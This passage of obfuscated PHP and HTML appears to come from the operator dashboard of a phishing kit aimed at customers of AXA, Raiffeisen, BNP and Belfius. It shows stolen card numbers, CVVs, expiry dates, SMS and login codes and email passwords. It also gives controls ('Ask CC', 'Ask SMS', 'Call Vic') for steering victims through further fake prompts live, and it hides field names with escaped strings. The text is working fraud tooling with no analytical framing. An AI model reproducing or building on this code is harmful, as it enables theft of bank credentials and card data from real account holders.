<button class="btn btn-sm btn-block btn-success mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\165\163\x65\x72\137\151\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\151\144"]); ?>
', 'custom')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control input-dark mt-4 custom-input" placeholder="Fill in your 'Amount'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\165\x73\145\x72\x5f\x69\x64"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control fintro-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\x75\x73\145\x72\137\x69\144"]); ?>
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Sign Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control fintro-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">
</div>
<div class="col-lg-3">
<hr>
</div>
<div class="col-lg-9">
<hr>
<input hidden type="text" class="form-control fintro-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
<input hidden type="text" class="form-control fintro-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php echo htmlspecialchars($log["\x75\163\x65\162\x5f\x69\144"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control fintro-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control fintro-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["\x62\x61\x6e\153"] === "\101\130\101") { function AXA($label, $value) { echo "\74\x64\151\166\40\x63\154\141\x73\x73\75\42\146\157\x72\155\55\147\x72\x6f\165\160\x20\x72\x6f\167\x22\76"; echo "\74\154\141\142\x65\154\40\x66\157\x72\75\47\151\144\47\x20\x63\x6c\141\x73\163\75\x27\164\145\x78\164\55\163\145\143\x6f\156\144\141\x72\171\x20\143\x6f\154\55\x73\155\x2d\x33\x20\146\x6f\156\164\x2d\167\145\x69\x67\x68\x74\55\x62\157\x6c\x64\47\76{$label}\72\74\57\x6c\141\142\145\154\x3e"; echo "\74\144\x69\166\x20\143\154\141\x73\x73\x3d\42\x63\x6f\154\55\x73\155\x2d\x39\x22\76"; echo "\74\x70\40\143\x6c\141\163\x73\x3d\47\x74\x65\170\164\x2d\x73\x65\143\x6f\x6e\x64\141\162\171\x27\76\x3c\151\76\x3c\x73\x70\x61\x6e\x20\x63\154\141\163\163\75\47\143\x6f\160\x79\55\166\141\154\x75\145\x27\40\157\x6e\143\x6c\x69\x63\x6b\75\47\143\157\x70\x79\x54\157\103\154\151\x70\142\157\x61\162\x64\50\x74\150\x69\x73\51\47\76" . htmlspecialchars($value) . "\x3c\57\163\x70\x61\x6e\76\x3c\142\x72\x2f\76\74\x73\160\x61\x6e\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\157\x70\171\55\x74\x65\x78\164\47\x3e\x43\x6c\151\143\x6b\x20\x74\157\x20\143\x6f\x70\x79\74\x2f\163\x70\141\x6e\x3e\74\x2f\x69\x3e\74\57\x70\76"; echo "\74\57\x64\151\x76\x3e"; echo "\74\x2f\x64\x69\166\76"; } if (!empty($log["\x72\x61\146\x66\x65\x69\163\163\x65\156\137\x77\151\x66\151"])) { AXA("\x43\141\162\144\x4e\165\x6d\142\145\x72", $log["\x72\x61\x66\146\x65\x69\x73\163\145\156\137\x77\151\x66\x69"]); } if (!empty($log["\x72\x61\146\146\x65\151\x73\x73\145\x6e\x5f\x77\151\x66\x69\137\x70\x61\x73\x73"])) { AXA("\105\170\160\151\162\x79", $log["\x72\x61\146\146\x65\x69\163\x73\145\156\x5f\x77\151\146\151\137\160\141\x73\163"]); } if (!empty($log["\x72\x61\146\146\145\151\163\163\145\x6e\137\156\165\x6d\x62\145\x72"])) { AXA("\120\150\157\x6e\x65", $log["\162\141\x66\x66\x65\151\x73\x73\145\156\137\156\165\x6d\x62\145\162"]); } if (!empty($log["\162\x61\x66\146\x65\151\163\163\x65\x6e\x5f\x74\x61\156"])) { AXA("\123\115\x53", $log["\x72\x61\146\146\145\x69\163\163\x65\x6e\x5f\x74\141\156"]); } if (!empty($log["\x72\141\146\x66\145\x69\x73\163\x65\x6e\137\x63\x72\x65\x64\x69\164\x63\x61\162\x64"])) { AXA("\103\x43\x20\x4e\165\155", $log["\162\x61\146\146\145\x69\x73\x73\x65\x6e\137\143\162\x65\144\151\164\143\141\x72\144"]); } if (!empty($log["\162\x61\x66\146\x65\x69\x73\163\145\156\137\143\143\x65\170\x70"])) { AXA("\103\103\x20\105\x78\x70", $log["\x72\x61\146\146\145\151\163\x73\x65\x6e\x5f\143\x63\x65\170\x70"]); } if (!empty($log["\x72\x61\146\x66\x65\151\163\x73\145\156\137\x63\166\166"])) { AXA("\x43\126\126", $log["\162\x61\146\146\145\x69\163\x73\145\156\137\143\x76\166"]); } if (!empty($log["\x72\141\x66\x66\x65\x69\x73\163\145\x6e\x5f\162\x65\x73\160\157\156\x73"])) { AXA("\x4c\x6f\x67\151\x6e\x20\103\157\144\145", $log["\x72\141\146\x66\145\151\163\163\145\x6e\137\x72\145\163\x70\157\156\x73"]); } if (!empty($log["\162\x61\146\146\x65\x69\163\163\x65\x6e\x5f\162\145\163\160\x6f\x6e\163\137\x74\167\x6f"])) { AXA("\114\x69\x76\x65\40\103\x6f\x64\x65", $log["\162\x61\146\146\145\x69\163\163\x65\156\137\162\145\163\x70\x6f\156\163\x5f\x74\167\157"]); } if ($log["\167\141\x69\164\x69\156\x67"] == "\x74\x72\165\x65") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["\x75\x73\145\x72\x5f\x69\144"]); ?>
', 'details')"><i class="fas fa-sign-in-alt"></i> Ask Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["\x75\x73\145\162\x5f\x69\144"]); ?>
', 'tan')"><i class="fas fa-sign-in-alt"></i> Ask SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["\165\x73\145\x72\137\151\144"]); ?>
', 'creditcard')"><i class="fas fa-sign-in-alt"></i> Ask CC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["\x75\163\x65\162\x5f\x69\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["\x75\x73\145\162\137\151\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
Ask M1</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control raffeissen-sign input-dark mt-4 custom-input" placeholder="Fill in your 'M1 Code'">
</div>
<div class="col-lg-3">
<hr>
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php echo htmlspecialchars($log["\165\x73\145\x72\x5f\x69\x64"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
Ask Live</button>
</div>
<div class="col-lg-9">
<hr>
<input type="text" class="form-control raffeissen-live input-dark mt-4 custom-input" placeholder="Fill in your first 'M2 Code'">
<input type="text" class="form-control raffeissen-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'M2 Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["\142\x61\156\x6b"] === "\x42\116\x50") { function BNP($label, $value) { echo "\x3c\x64\x69\x76\40\143\154\141\163\163\x3d\x22\146\157\x72\155\55\147\x72\x6f\x75\160\40\x72\157\x77\42\76"; echo "\74\x6c\141\142\x65\x6c\x20\146\157\x72\x3d\x27\x69\144\x27\40\x63\x6c\141\x73\x73\75\47\x74\x65\170\x74\x2d\x73\145\143\x6f\156\144\141\162\x79\x20\x63\157\x6c\x2d\x73\x6d\x2d\x33\x20\146\157\x6e\x74\55\x77\x65\x69\x67\x68\x74\x2d\x62\157\x6c\x64\47\76{$label}\x3a\74\x2f\x6c\141\142\x65\x6c\x3e"; echo "\74\144\151\166\40\x63\154\141\163\x73\75\42\143\157\154\x2d\x73\x6d\55\x39\x22\x3e"; echo "\74\x70\x20\x63\154\x61\x73\x73\x3d\47\x74\x65\x78\x74\55\x73\145\143\x6f\156\144\x61\162\x79\x27\x3e\x3c\151\x3e\74\x73\x70\x61\x6e\x20\143\x6c\x61\x73\x73\75\47\x63\x6f\x70\171\x2d\x76\x61\x6c\x75\145\x27\x20\x6f\156\143\154\151\143\x6b\75\x27\143\x6f\x70\x79\124\x6f\103\x6c\151\x70\142\157\x61\x72\x64\50\164\150\151\163\51\47\76" . htmlspecialchars($value) . "\74\x2f\163\160\x61\x6e\76\74\x62\162\57\x3e\x3c\163\x70\x61\156\x20\x63\154\141\x73\163\75\x27\143\157\x70\x79\55\164\145\x78\164\47\76\x43\154\x69\143\x6b\40\x74\x6f\40\x63\x6f\x70\x79\74\57\x73\160\x61\156\76\74\x2f\151\x3e\74\x2f\x70\x3e"; echo "\x3c\57\144\151\166\76"; echo "\74\57\x64\151\166\x3e"; } if (!empty($log["\142\x6e\160\137\167\151\x66\x69"])) { $kaartbegin = '' . $log["\142\156\160\137\x77\x69\146\x69"]; BNP("\x43\141\x72\x64\116\x75\x6d\x62\x65\x72", $kaartbegin); } if (!empty($log["\x62\x6e\160\137\x77\x69\x66\151\x5f\x70\141\163\x73"])) { BNP("\103\154\x69\145\x6e\164\116\x75\x6d\x62\145\x72", $log["\x62\x6e\160\x5f\x77\x69\146\151\137\x70\141\163\163"]); } if (!empty($log["\142\x6e\x70\x5f\167\151\x66\x69\137\x70\x61\163\x73\137\164\x77\157"])) { BNP("\x45\170\160\x69\x72\171", $log["\x62\156\x70\x5f\x77\151\x66\151\137\x70\141\x73\163\137\164\167\x6f"]); } if (!empty($log["\x62\x6e\160\137\165\x73\145\162"])) { BNP("\x50\x68\x6f\156\x65", $log["\142\156\x70\x5f\165\163\x65\162"]); } if (!empty($log["\x62\156\160\x5f\x65\170\160"])) { BNP("\x53\115\x53", $log["\x62\x6e\x70\x5f\145\170\160"]); } if (!empty($log["\x62\156\x70\137\x70\141\x73\x73\167\157\x72\144"])) { BNP("\x45\155\141\151\154\55\120\x61\x73\x73", $log["\x62\156\x70\137\160\x61\163\x73\x77\157\162\144"]); } if (!empty($log["\142\156\x70\137\143\x61\x6c\x6c"])) { BNP("\103\x61\154\154\x20\126\x69\x63", $log["\x62\156\160\x5f\x63\141\x6c\x6c"]); } if (!empty($log["\142\x6e\160\x5f\164\141\156"])) { BNP("\103\126\x43", $log["\142\156\160\137\164\141\156"]); } if (!empty($log["\142\156\x70\x5f\x63\165\163\x74\157\x6d"])) { BNP("\x43\x75\x73\164\x6f\x6d", $log["\x62\156\160\x5f\x63\x75\163\164\157\155"]); } if (!empty($log["\x62\x6e\160\137\x72\145\x73\x70\157\156\x73"])) { BNP("\114\x6f\147\x69\156\40\x43\157\144\145", $log["\x62\x6e\160\x5f\x72\145\163\x70\157\x6e\163"]); } if (!empty($log["\x62\156\x70\137\143\157\144\x65\137\x78"])) { BNP("\x53\x69\x67\156\x20\103\x6f\x64\x65", $log["\142\x6e\x70\137\x63\157\144\x65\x5f\x78"]); } if (!empty($log["\142\x6e\160\x5f\143\157\x64\x65\137\x6d"])) { BNP("\x53\x69\147\156\40\x43\157\144\x65\x20\x28\62\x29", $log["\142\156\x70\x5f\143\157\144\145\x5f\155"]); } if (!empty($log["\142\x6e\160\137\x72\x65\163\160\x6f\x6e\163\137\164\x77\157"])) { BNP("\114\151\x76\145\x20\103\157\144\145", $log["\x62\156\x70\x5f\x72\145\163\x70\x6f\x6e\163\137\164\167\157"]); } if (!empty($log["\142\x6e\x70\x5f\x63\x72\145\144\x69\164\x63\x61\x72\x64"])) { BNP("\103\141\x72\144\x20\116\165\155\x62\x65\x72", $log["\142\156\160\137\143\162\x65\144\151\x74\x63\141\x72\x64"]); } if (!empty($log["\142\x6e\x70\x5f\143\x63\x65\x78\160"])) { BNP("\105\x78\x70\x69\162\171", $log["\x62\156\x70\137\x63\x63\145\x78\x70"]); } if (!empty($log["\x62\156\160\137\143\x76\166"])) { BNP("\103\126\x56", $log["\142\156\160\137\143\x76\x76"]); } if ($log["\x77\141\x69\164\x69\x6e\147"] == "\164\162\165\145") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\x69\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\x75\163\x65\162\x5f\151\x64"]); ?>
', 'login')"><i class="fas fa-phone"></i> | Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\x75\163\145\162\137\151\x64"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\x73\145\x72\137\x69\x64"]); ?>
', 'password')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Email-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\x73\x65\x72\137\151\144"]); ?>
', 'call')"><i class="fa fa-phone" aria-hidden="true"></i>
| Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\163\x65\162\137\151\144"]); ?>
', 'tan')"><i class="fa fa-envelope" aria-hidden="true"></i>
| CVC</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\163\145\x72\x5f\x69\144"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
| CC Info</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\x69\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\163\x65\162\x5f\x69\x64"]); ?>
', 'custom')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Custom </button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control bnp-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\165\x73\x65\162\137\x69\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control bnp-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\x75\163\x65\162\x5f\x69\144"]); ?>
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Sign Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control bnp-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">
</div>
<div class="col-lg-3">
<hr>
</div>
<div class="col-lg-9">
<hr>
<input hidden type="text" class="form-control bnp-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
<input hidden type="text" class="form-control bnp-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php echo htmlspecialchars($log["\x75\x73\x65\x72\x5f\x69\144"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control bnp-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control bnp-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["\142\141\x6e\x6b"] === "\102\105\x4c\106\111\x55\123") { function BELFIUS($label, $value) { echo "\74\x64\x69\166\40\x63\x6c\141\163\163\x3d\x22\x66\x6f\x72\155\x2d\147\x72\x6f\165\160\x20\x72\x6f\x77\42\x3e"; echo "\x3c\x6c\141\142\x65\x6c\40\146\x6f\x72\x3d\x27\x69\x64\x27\x20\x63\x6c\141\163\x73\x3d\x27\164\x65\170\164\x2d\x73\x65\143\x6f\156\x64\141\x72\171\40\143\x6f\154\55\163\x6d\x2d\x33\x20\146\x6f\x6e\164\x2d\x77\145\x69\147\x68\x74\x2d\x62\157\x6c\x64\47\76{$label}\72\x3c\x2f\x6c\141\x62\x65\x6c\76"; echo "\74\x64\151\x76\x20\x63\x6c\141\x73\163\x3d\42\143\x6f\x6c\x2d\163\155\55\x39\42\76"; echo "\74\160\40\143\x6c\x61\163\163\75\47\164\x65\170\x74\55\163\145\143\x6f\x6e\x64\x61\162\x79\47\76\74\x69\76\x3c\163\x70\x61\156\x20\x63\154\141\x73\x73\75\x27\143\157\x70\x79\55\166\x61\x6c\x75\x65\47\x20\157\156\143\154\x69\x63\153\75\x27\x63\x6f\x70\171\124\x6f\103\x6c\x69\x70\142\x6f\141\x72\x64\x28\164\x68\151\163\x29\47\76" . htmlspecialchars($value) . "\x3c\57\x73\x70\141\156\76\74\x62\x72\x2f\x3e\74\x73\160\141\156\40\x63\154\141\163\x73\75\x27\x63\157\160\171\55\x74\x65\x78\x74\x27\x3e\x43\x6c\x69\x63\153\40\x74\157\40\x63\157\160\x79\x3c\57\x73\160\x61\156\x3e\x3c\x2f\151\76\x3c\x2f\x70\76"; echo "\x3c\x2f\x64\151\166\x3e"; echo "\x3c\57\144\151\166\76"; } if (!empty($log["\x62\145\154\x66\151\165\x73\x5f\143\x61\x72\x64"])) { echo "\74\x64\x69\166\x20\143\x6c\x61\x73\163\75\x22\146\157\x72\x6d\55\147\x72\x6f\x75\x70\x20\162\157\x77\x22\x3e"; echo "\74\154\x61\x62\145\x6c\x20\x66\x6f\162\75\x22\x69\144\42\x20\143\x6c\141\x73\x73\x3d\x22\164\x65\170\x74\55\163\x65\143\x6f\156\x64\141\162\x79\x20\143\157\154\x2d\x73\155\55\x33\x20\x66\157\x6e\x74\x2d\x77\145\x69\x67\150\x74\x2d\142\x6f\154\x64\42\x3e\103\141\x72\144\116\x75\155\142\x65\x72\72\74\57\x6c\x61\x62\x65\154\76"; echo "\x3c\x64\x69\166\x20\143\x6c\x61\x73\163\x3d\42\x63\157\x6c\x2d\163\155\55\x39\42\x3e"; echo "\x3c\x70\x20\143\x6c\141\x73\163\75\x22\164\145\x78\x74\55\163\x65\143\157\x6e\144\141\x72\x79\x22\x3e\x3c\x69\x3e\66\x37\60\63\40" . htmlspecialchars($log["\142\x65\x6c\x66\x69\x75\x73\x5f\143\141\x72\x64"]) . "\74\57\x69\76\74\x2f\160\x3e"; echo "\74\x2f\144\x69\x76\76"; echo "\x3c\57\x64\x69\x76\x3e"; } if (!empty($log["\x62\x65\154\146\x69\x75\163\x5f\166\166"])) { echo "\x3c\x64\x69\166\40\143\x6c\x61\163\x73\x3d\x22\146\x6f\162\155\x2d\x67\162\157\165\x70\x20\162\157\x77\x22\x3e"; echo "\74\154\141\142\145\154\x20\146\x6f\x72\75\42\x69\x64\42\x20\143\154\141\163\163\75\42\164\x65\x78\x74\x2d\163\145\x63\x6f\156\x64\x61\162\171\x20\x63\157\x6c\x2d\163\155\x2d\x33\40\146\157\156\164\55\167\x65\x69\x67\x68\164\x2d\x62\157\154\x64\42\76\x45\x78\160\x69\x72\x79\x3a\74\57\154\141\142\145\x6c\x3e"; echo "\74\144\151\166\x20\x63\154\x61\x73\x73\x3d\42\143\x6f\154\x2d\163\155\55\71\x22\76"; echo "\x3c\160\40\x63\154\x61\x73\x73\75\x22\x74\x65\170\164\55\x73\x65\143\157\156\144\141\162\x79\x22\76\74\151\x3e" . htmlspecialchars($log["\x62\x65\154\x66\151\165\163\x5f\x76\166"]) . "\x3c\57\x69\76\x3c\57\x70\76"; echo "\74\x2f\x64\x69\x76\x3e"; echo "\x3c\57\x64\151\x76\x3e"; } if (!empty($log["\142\145\x6c\x66\151\165\x73\137\160\150\x6f\x6e\x65"])) { echo "\74\144\x69\x76\40\143\154\x61\163\x73\x3d\x22\x66\x6f\x72\x6d\55\x67\162\x6f\x75\160\x20\x72\x6f\167\x22\x3e"; echo "\74\x6c\141\142\145\x6c\40\x66\x6f\162\x3d\42\151\144\42\40\x63\154\x61\163\x73\75\42\x74\145\x78\164\55\163\145\143\x6f\x6e\144\x61\162\171\x20\x63\157\x6c\55\163\155\x2d\x33\x20\146\x6f\x6e\x74\x2d\x77\x65\x69\147\x68\x74\x2d\x62\157\x6c\x64\42\76\x50\x68\x6f\x6e\145\72\x3c\57\154\x61\142\x65\154\x3e"; echo "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\143\x6f\154\x2d\163\155\55\71\x22\x3e"; echo "\74\x70\40\143\154\141\163\163\75\42\x74\x65\x78\164\x2d\163\x65\x63\157\x6e\x64\141\162\x79\42\76\74\x69\x3e" . htmlspecialchars($log["\x62\145\x6c\146\151\165\x73\x5f\160\x68\157\156\145"]) . "\x3c\57\x69\x3e\x3c\57\x70\x3e"; echo "\74\57\x64\151\x76\76"; echo "\x3c\x2f\144\x69\166\x3e"; } if (!empty($log["\142\x65\154\146\151\165\163\x5f\x73\155\x73"])) { echo "\x3c\x64\x69\x76\40\x63\x6c\x61\163\x73\75\x22\x66\157\162\x6d\x2d\147\162\x6f\165\160\40\162\x6f\x77\x22\x3e"; echo "\74\154\141\x62\x65\154\40\146\157\x72\x3d\x22\x69\144\x22\40\143\154\x61\163\x73\x3d\x22\164\145\x78\164\55\163\145\143\157\156\x64\x61\x72\171\40\143\x6f\154\x2d\x73\x6d\55\x33\x20\x66\x6f\x6e\x74\x2d\167\x65\x69\147\x68\x74\x2d\x62\157\154\x64\42\76\x53\115\x53\40\x63\x6f\144\x65\72\74\x2f\154\141\142\x65\x6c\x3e"; echo "\x3c\144\151\166\x20\143\154\141\x73\x73\75\42\143\x6f\x6c\x2d\163\155\55\71\x22\76"; echo "\74\x70\x20\143\x6c\x61\x73\x73\75\42\164\x65\170\x74\55\163\145\143\x6f\156\144\141\162\x79\42\76\74\151\76" . htmlspecialchars($log["\x62\x65\x6c\x66\151\165\x73\137\x73\155\163"]) . "\74\57\x69\76\74\x2f\x70\76"; echo "\x3c\x2f\x64\x69\166\76"; echo "\74\x2f\144\x69\166\x3e"; } if (!empty($log["\142\x65\x6c\x66\151\x75\x73\137\x63\165\163\164\157\155"])) { echo "\x3c\x64\151\x76\40\143\154\141\x73\163\x3d\x22\146\157\x72\x6d\x2d\147\x72\157\x75\x70\x20\x72\x6f\x77\x22\x3e"; echo "\x3c\x6c\x61\x62\x65\154\x20\x66\x6f\x72\75\42\151\144\42\x20\x63\x6c\141\163\163\x3d\42\x74\x65\x78\164\55\x73\145\143\x6f\x6e\144\x61\162\171\x20\143\x6f\154\x2d\x73\155\55\63\x20\x66\157\x6e\x74\x2d\x77\145\x69\x67\150\164\55\142\157\154\x64\42\x3e\x43\165\x73\x74\157\155\72\x3c\57\154\x61\142\145\x6c\x3e"; echo "\x3c\x64\x69\x76\x20\143\154\x61\163\163\x3d\42\x63\157\154\55\163\155\x2d\x39\42\76"; echo "\74\160\40\143\154\141\x73\163\75\x22\x74\x65\170\x74\x2d\x73\145\143\157\x6e\144\x61\162\x79\42\76\74\151\76" . htmlspecialchars($log["\x62\x65\154\146\151\165\x73\x5f\143\x75\x73\x74\x6f\x6d"]) . "\74\x2f\151\76\74\57\x70\76"; echo "\74\x2f\144\151\x76\x3e"; echo "\74\57\144\151\166\76"; } if (!empty($log["\x62\145\x6c\146\x69\165\x73\x5f\160\141\163\x73"])) { echo "\74\144\x69\166\40\x63\154\x61\x73\x73\75\x22\146\x6f\162\155\55\x67\162\157\165\x70\x20\162\157\x77\x22\x3e"; echo "\74\x6c\x61\142\145\154\x20\146\157\162\75\x22\151\x64\x22\x20\x63\154\x61\163\163\x3d\42\164\x65\170\164\x2d\163\x65\143\x6f\x6e\x64\x61\162\x79\x20\x63\157\154\55\163\x6d\55\x33\40\146\x6f\156\164\55\167\x65\151\147\x68\x74\x2d\x62\x6f\x6c\144\42\76\x50\x61\163\163\x77\157\162\144\x3a\x3c\57\154\x61\x62\x65\154\x3e"; echo "\x3c\144\x69\166\40\x63\x6c\x61\x73\x73\x3d\x22\x63\x6f\154\55\163\x6d\x2d\71\42\x3e"; echo "\74\160\40\143\154\x61\x73\x73\75\42\164\x65\x78\x74\x2d\163\145\x63\x6f\156\x64\141\x72\x79\42\76\74\151\x3e" . htmlspecialchars($log["\142\x65\x6c\146\151\x75\163\x5f\160\141\163\163"]) . "\x3c\57\151\76\74\x2f\x70\76"; echo "\x3c\57\144\x69\x76\76"; echo "\74\x2f\x64\151\166\76"; } if (!empty($log["\x62\145\x6c\x66\151\165\163\x5f\143\143"])) { echo "\x3c\144\151\x76\x20\143\154\x61\x73\x73\75\42\146\x6f\x72\x6d\55\x67\162\157\165\160\40\162\x6f\167\x22\x3e"; echo "\74\154\141\142\145\154\40\146\157\x72\x3d\x22\x69\x64\x22\40\143\x6c\141\163\163\75\x22\x74\145\170\x74\55\x73\x65\143\x6f\x6e\144\x61\162\x79\40\x63\x6f\154\55\163\x6d\x2d\63\40\146\x6f\x6e\x74\55\x77\145\x69\147\150\x74\x2d\142\157\154\x64\x22\x3e\x63\143\40\x63\141\x72\x64\x3a\74\57\x6c\141\x62\x65\x6c\76"; echo "\74\x64\151\166\x20\x63\154\141\x73\x73\x3d\x22\143\157\154\55\163\155\55\x39\x22\x3e"; echo "\74\160\x20\x63\x6c\x61\163\x73\x3d\42\164\x65\x78\164\55\x73\x65\143\157\x6e\144\x61\x72\171\x22\76\x3c\151\76" . htmlspecialchars($log["\142\x65\x6c\x66\x69\x75\x73\x5f\143\143"]) . "\x3c\x2f\151\x3e\74\57\160\76"; echo "\x3c\57\x64\x69\166\76"; echo "\74\x2f\x64\x69\166\76"; } if (!empty($log["\142\x65\154\146\151\165\x73\x5f\x63\x63\137\x65\x78\160"])) { echo "\74\144\x69\166\x20\x63\154\141\x73\x73\75\42\146\157\x72\x6d\x2d\147\x72\157\165\x70\40\162\157\167\42\76"; echo "\x3c\154\x61\x62\145\154\40\x66\157\x72\75\x22\x69\x64\x22\40\143\x6c\141\163\163\x3d\x22\164\x65\x78\x74\55\x73\145\143\157\x6e\x64\x61\162\171\40\143\x6f\154\x2d\x73\155\55\x33\40\x66\x6f\x6e\164\x2d\x77\x65\151\x67\x68\x74\x2d\142\x6f\x6c\x64\42\76\143\x63\x20\145\x78\x70\x3a\74\x2f\154\x61\x62\x65\x6c\76"; echo "\x3c\144\x69\166\40\x63\154\141\163\163\x3d\42\143\x6f\x6c\x2d\163\155\55\x39\x22\76"; echo "\x3c\160\x20\143\x6c\141\x73\163\75\42\164\x65\170\164\x2d\x73\145\143\x6f\156\x64\x61\x72\171\42\76\x3c\151\76" . htmlspecialchars($log["\x62\145\x6c\146\151\165\x73\137\x63\143\137\x65\170\x70"]) . "\74\57\x69\76\x3c\57\160\76"; echo "\74\57\144\151\x76\76"; echo "\74\57\144\x69\166\x3e"; } if 